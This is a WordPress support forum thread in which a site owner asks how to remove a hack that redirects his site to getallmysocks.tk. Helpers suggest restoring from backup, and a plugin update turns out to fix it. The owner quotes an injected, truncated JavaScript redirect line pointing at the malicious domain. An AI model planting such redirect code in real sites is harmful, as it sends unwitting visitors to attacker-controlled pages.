My wordpress site roscoandroy.com load for a couple of second then keeps trying to redirect to a another site getallmysocks[dot]tk before then redirecting to a timewarner search page. After doing some research I saw on another form that there could be this code document.location.href=”https://getallmysocks.tk/tracking.php…”;window.location.href=”https://getallmysocks.tk/tracking.php…”; added to a header or footer. I can’t seem to find it.

Any ideas where I should look for this code or other ideas how to fix this hack?

    Thanks so much.

    Andy

  • I am sorry to hear your site is damaged. Do you or your hosting company have a full backup of your site? The fastest and most sure way to repair your site is to restore from a backup made before the hack.

Without a backup your only permanent solution is to repair the site. Follow this guide.

When you’re done, you may want to implement some (if not all) of the recommended security measures.

Hi wslade. Thanks for your reply. I do have a backup (and am making yet another right now.

BUT I did just find the solution! I did more searching on the support forum and read that the hack could be from a vulnerability in the plugin Fancy Box for WordPress. I updated that plugin and if fixed the problem!

I WILL check out the link you provided for the security measures. Thanks!

I’m glad you found a file with malware. A hack seldom only affects one file. Adding a good security plugin is good. But there is no better solution than restoring from a known good backup.
